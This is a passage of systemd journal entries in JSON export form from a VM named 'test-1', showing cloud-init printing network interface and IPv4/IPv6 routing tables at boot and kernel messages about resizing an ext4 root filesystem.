"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2de0cabb7107f1d7", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | 192.168.10.95 | 255.255.255.0 | global | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25c;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=233b249cf336f0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", 
"_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | fe80::f816:3eff:fe55:6ae2/64 | . | link | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25d;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b46b42cabef260e0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25e;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=caac27a601f8a351", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | ::1/128 | . | host | . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25f;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: 
+--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=260;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=4a33c63bdc09703d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: ++++++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=261;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", 
"_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=262;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a60f616505a8540b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=263;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : 
"/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=264;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=e6c753992d003dbc", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 0 | 0.0.0.0 | 192.168.10.1 | 0.0.0.0 | ens3 | UG |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=265;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=de822f4a065b1b15", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 
/usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | 169.254.169.254 | 192.168.10.2 | 255.255.255.255 | ens3 | UGH |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=266;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2b92ad0a201ebd9e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 2 | 192.168.10.0 | 0.0.0.0 | 255.255.255.0 | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=267;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", 
"_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=268;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b229ce65b1002b2b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=269;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=7f010c225ad3867e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", 
"_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26c;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=793b73d8c5f739c0", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | fe80::/64 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26d;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=2a8bc0b4a4e1dc94", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 3 | local | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26e;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=6e95665ae5a7b346", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 4 | ff00::/8 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26f;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", 
"_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=270;b=e2b08827b5804427b422c10c84f1567e;m=28a1619;t=5bd16df4d957f;x=df409df7f70e977c", "__REALTIME_TIMESTAMP" : "1615280816887167", "__MONOTONIC_TIMESTAMP" : "42604057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42603851", "MESSAGE" : "EXT4-fs (vda1): resizing filesystem from 548091 to 5214459 blocks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=271;b=e2b08827b5804427b422c10c84f1567e;m=28d13e2;t=5bd16df509348;x=ecaad3873edaaa81", "__REALTIME_TIMESTAMP" : "1615280817083208", "__MONOTONIC_TIMESTAMP" : "42800098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42796587", 